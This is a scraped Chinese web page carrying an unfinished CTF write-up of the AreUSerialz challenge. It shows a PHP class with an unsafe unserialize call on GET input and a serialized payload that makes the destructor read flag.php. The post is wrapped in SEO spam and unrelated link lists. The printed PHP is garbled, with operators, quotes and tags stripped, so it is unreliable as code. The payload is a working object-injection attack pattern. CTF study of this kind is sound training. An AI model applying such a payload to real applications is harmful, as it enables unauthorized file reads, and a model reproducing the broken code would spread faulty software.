当前位置: 首页 > news >正文

做公司网站怎么做手机版自己做seo网站推广

news 2026/4/21 14:02:56
做公司网站怎么做手机版,自己做seo网站推广,上海网站制作哪家好,wordpress压缩包导言#xff1a; 本文主要讲述在CTF竞赛网鼎杯中#xff0c;web类题目AreUSerialz。 靶场链接#xff1a;BUUCTF在线评测 一#xff0c;分析代码。 看到了一大段php代码。 ?php// 引入flag.php文件 include(flag.php);// 高亮显示当前文件 highlight…  导言 本文主要讲述在CTF竞赛网鼎杯中web类题目AreUSerialz。 靶场链接BUUCTF在线评测 一分析代码。 看到了一大段php代码。 ?php// 引入flag.php文件 include(flag.php);// 高亮显示当前文件 highlight_file(__FILE__);// 定义FileHandler类 class FileHandler {// 定义属性protected $op;protected $filename;protected $content;// 构造函数function __construct() {// 初始化属性$op 1;$filename /tmp/tmpfile;$content Hello World!;// 调用process方法$this-process();}// 处理方法public function process() {// 根据op属性的值调用不同的方法if($this-op 1) {$this-write();} else if($this-op 2) {$res $this-read();$this-output($res);} else {$this-output(Bad Hacker!);}}// 写入文件方法private function write() {// 判断filename和content属性是否存在if(isset($this-filename) isset($this-content)) {// 判断content属性的长度是否超过100if(strlen((string)$this-content) 100) {$this-output(Too long!);die();}// 调用file_put_contents函数将content属性写入filename属性指定的文件$res file_put_contents($this-filename, $this-content);// 判断写入是否成功if($res) $this-output(Successful!);else $this-output(Failed!);} else {$this-output(Failed!);}}// 读取文件方法private function read() {$res ;// 判断filename属性是否存在if(isset($this-filename)) {// 调用file_get_contents函数读取filename属性指定的文件内容$res file_get_contents($this-filename);}return $res;}// 输出方法private function output($s) {echo [Result]: br;echo $s;}// 析构函数function __destruct() {// 如果op属性的值为2则将其改为1。if($this-op 2)$this-op 1;// 将content属性置空$this-content ;// 调用process方法$this-process();}}// 定义is_valid函数判断字符串是否合法 function is_valid($s) {for($i 0; $i strlen($s); $i)if(!(ord($s[$i]) 32 ord($s[$i]) 125))return false;return true; }// 判断是否存在GET参数str if(isset($_GET{str})) {// 获取GET参数str的值$str (string)$_GET[str];// 判断str是否合法if(is_valid($str)) {// 反序列化str$obj unserialize($str);}} 可以知道 1这是一个反序列化题目。 2使用get传参传参名为str。 3flag在flag.php内。 4代码中使用了is_valid函数来验证输入字符串的合法性即传入的str的每个字母的ascii值在32和125之间。 5根据其中的 得知传参格式。 二构造payload。 根据代码内的 protected $op;protected $filename;protected $content; 可以知道payload为 ?phpclass FileHandler {public $op 2; //根据题意进行的传参public $filename flag.php;public $content 2; }$q new FileHandler(); //对其进行反序列化操作 echo(serialize($q));? 输出结果为 ?strO:11:FileHandler:3:{s:2:op;i:2;s:8:filename;s:8:flag.php;s:7:content;s:1:2;} 使用hackbar进行传参后 并无回显。 查看页面源码发现
http://www.hkea.cn/news/14355436/

相关文章:

  • 毕设做的网站可以用模板改吗网站底部版权信息格式
  • 网站项目开发网站制作软件是什么
  • 链接推广平台百度爱采购优化排名软件
  • 网站建设丨金手指排名哪些网站是单页应用
  • 四川省城乡住房与建设厅网站首页装修素材网站有哪些
  • 网站登录验证码显示不出来内部网站 建设方案
  • 有没有做网站的教程成都自动seo
  • 手工做的网站大学科研项目做网站
  • wordpress图片像素seo网站优化外包
  • 自己建网站做那个模块好北京包装设计公司
  • 网站建设尺寸规范树苗网站源码
  • 母婴网站建设初衷做网站网页版和手机版
  • 毕节建设局网站seo智能优化
  • 弹幕网站是什么技术做的在线免费网站建设平台
  • 网站前台模板下载小程序和h5的区别和优势
  • 找合伙人的网站做淘宝wordpress yii
  • 光谷软件园企业网站建设公司品牌词类的网站怎么做优化
  • 网站制作书籍推荐青岛网上房地产
  • 如何使用wordpress搭建网站湖南注册公司
  • 做网站应下哪个软件网站推荐几个免费的
  • 跟京东类似的网站wordpress后台增加图片广告位
  • 三品合一网站建设案例一起做网店官网
  • 网站要咋建立丽水网站推广公司
  • 东莞网站建设十大品牌郑州快速网站优化公司首选
  • 网站建设方案书 人员资金安排北京网站建设上石榴汇
  • js网站开发工具家具网站开发环境与工具
  • 网站建设技能直播网站做收入流水
  • 电子商务网站建设完整详细流程js网站变灰色代码
  • 咸阳网站建设专业公司深圳app开发公司大概价格
  • 婚纱摄影手机网站欣赏seo搜索引擎优化价格